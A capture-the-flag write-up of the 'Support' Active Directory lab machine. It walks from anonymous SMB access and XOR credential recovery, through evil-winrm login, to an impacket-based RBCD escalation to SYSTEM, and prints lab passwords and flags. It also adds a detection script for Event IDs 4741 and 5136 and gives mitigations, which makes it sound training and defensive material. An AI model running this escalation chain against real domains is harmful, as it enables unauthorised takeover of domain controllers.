Overview
Support is an Easy Windows machine simulating an Active Directory Domain Controller. The attack chain involves SMB enumeration, .NET binary analysis, credential decryption, LDAP enumeration, and privilege escalation via Resource-Based Constrained Delegation (RBCD).
Reconnaissance
Host Discovery
ping -c 1 10.129.X.X
ttl=127 → Indicates Windows host
Port Scanning
nmap -sS -p- --open --min-rate 5000 -Pn -n 10.129.X.X
53 (DNS), 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM)
SMB Enumeration
smbclient -L //10.129.X.X -N
support-tools → Non-standard share (interesting)
smbclient //10.129.X.X/support-tools -N
get UserInfo.exe.zip
Binary Analysis
unzip UserInfo.exe.zip
strings -e l UserInfo.exe
Encrypted password: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
Key: armando
User: support\ldap
Password Decryption
The stored value is the Base64 encoding of the password XORed with the hardcoded key.
Decrypted password:
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
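The point of this step for a defender is that XOR with a static key stored next to the ciphertext is obfuscation, not encryption: anyone who can read the binary recovers the credential with a few lines of code. The following is an added example (not code from the writeup or from UserInfo.exe) that reproduces the scheme using the two strings recovered above. One detail the writeup leaves implicit: the binary's routine XORs each byte with the repeating key and with the fixed constant 0xDF; without that constant the output is not printable, which is how the constant is confirmed against the password above.

```python
import base64

# Values recovered from the UserInfo.exe strings output on the page.
ENC_PASSWORD_B64 = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
# The binary's routine XORs every byte with the repeating key AND the
# fixed constant 0xDF (223); checked against the recovered password.
CONSTANT = 0xDF


def decrypt(enc_b64: str, key: bytes, constant: int = CONSTANT) -> str:
    """Reverse the scheme: Base64-decode, then XOR each byte with key[i % len(key)] and the constant."""
    data = base64.b64decode(enc_b64)
    plain = bytes(b ^ key[i % len(key)] ^ constant for i, b in enumerate(data))
    # Encoding.Default in .NET on a Western locale is a single-byte code page;
    # latin-1 round-trips every byte value so nothing is lost.
    return plain.decode("latin-1")


def obfuscate(plain: str, key: bytes, constant: int = CONSTANT) -> str:
    """The forward direction, to show the scheme is symmetric: same XOR, then Base64."""
    raw = plain.encode("latin-1")
    enc = bytes(b ^ key[i % len(key)] ^ constant for i, b in enumerate(raw))
    return base64.b64encode(enc).decode("ascii")


if __name__ == "__main__":
    pw = decrypt(ENC_PASSWORD_B64, KEY)
    print("ldap service account password:", pw)
    # Round trip: re-encoding yields exactly the string found in the binary.
    assert obfuscate(pw, KEY) == ENC_PASSWORD_B64
```

The round trip in `obfuscate` shows there is no secret anywhere in this construction: key, constant and ciphertext all ship in the same file. The mitigation is not a stronger XOR but removing the credential from the client binary altogether (for example, having the tool authenticate as the running user, or fetching the secret from a vault at runtime).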
LDAP Enumeration
ldapsearch -x -H ldap://10.129.X.X \
-D 'support\ldap' \
-w 'password'
Password of the support user, disclosed in the LDAP results:
Ironside47pleasure40Watchful
Initial Access (WinRM)
evil-winrm -i 10.129.X.X -u support -p Ironside47pleasure40Watchful
Access as support user obtained
User Flag: 90ff758144e77feda1f79734e57b8abf
Privilege Escalation (RBCD)
The support user is a member of a group that holds GenericAll over the Domain Controller's computer object, which allows a Resource-Based Constrained Delegation attack.
impacket-addcomputer support.htb/support:'password'
Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount FAKE$
impacket-getST support.htb/FAKE$ -impersonate Administrator
impacket-psexec -k -no-pass support.htb/Administrator
SYSTEM access obtained
Root Flag: d0b25369aadbc499f993e59be095b5ee
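Seen from the blue team, the chain above leaves two distinct traces in the Security log: a computer account created by an ordinary user (Event ID 4741, the default ms-DS-MachineAccountQuota of 10 lets any domain user do this), followed by a write to msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object (Event ID 5136, which requires "Audit Directory Service Changes" and a SACL on the object). The following is an added example, not part of the writeup, that runs that detection logic over constructed sample events shaped like the EventData fields of the Security-log XML; the account names, DNs and the authorised-joiner set are assumptions for illustration.

```python
# Constructed sample events (not real logs from the machine). Field names
# follow the EventData of Security events 4741 and 5136.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "support", "TargetUserName": "FAKE$"},
    {"EventID": 4741, "SubjectUserName": "svc_join", "TargetUserName": "WS01$"},
    {"EventID": 5136, "SubjectUserName": "support",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=WS01,CN=Computers,DC=support,DC=htb",
     "AttributeLDAPDisplayName": "description"},
]

# Assumed: the only principals that legitimately join machines to the domain.
AUTHORISED_JOINERS = {"svc_join"}
RBCD_ATTRIBUTE = "msDS-AllowedToActOnBehalfOfOtherIdentity"


def find_rbcd_indicators(events, authorised_joiners=AUTHORISED_JOINERS):
    """Return (indicator, actor, object) tuples for the two steps of an RBCD chain."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4741 and ev.get("SubjectUserName") not in authorised_joiners:
            # Machine account created by a principal that should never join hosts:
            # the MachineAccountQuota abuse that produces FAKE$ above.
            findings.append(("machine-account-created-by-unexpected-principal",
                             ev["SubjectUserName"], ev["TargetUserName"]))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTRIBUTE:
            # Any write to this attribute is rare enough to alert on; a write to a
            # Domain Controller object is critical.
            findings.append(("rbcd-attribute-modified",
                             ev["SubjectUserName"], ev["ObjectDN"]))
    return findings


def correlate_chain(findings):
    """Actors that both created a machine account and wrote the RBCD attribute."""
    creators = {actor for kind, actor, _ in findings
                if kind == "machine-account-created-by-unexpected-principal"}
    writers = {actor for kind, actor, _ in findings if kind == "rbcd-attribute-modified"}
    return creators & writers


def is_domain_controller(object_dn):
    """Crude but reliable: DC computer objects live in the Domain Controllers OU."""
    return "OU=Domain Controllers," in object_dn


if __name__ == "__main__":
    hits = find_rbcd_indicators(SAMPLE_EVENTS)
    for kind, actor, obj in hits:
        severity = "CRITICAL" if kind == "rbcd-attribute-modified" and is_domain_controller(obj) else "HIGH"
        print(f"{severity}: {kind} actor={actor} object={obj}")
    print("full RBCD chain by:", correlate_chain(hits))
```

Both signals are cheap to collect, but the preventive fixes matter more: set ms-DS-MachineAccountQuota to 0 so ordinary users cannot create the machine account the attack needs, and audit which groups hold GenericAll (or WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity) over Domain Controller computer objects, since that ACE is the root cause on this box.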
Summary
- SMB → Anonymous share access
- Binary → Hardcoded encrypted credentials
- XOR → Password decryption
- LDAP → Password disclosure
- WinRM → Initial foothold
- RBCD → Privilege escalation to SYSTEM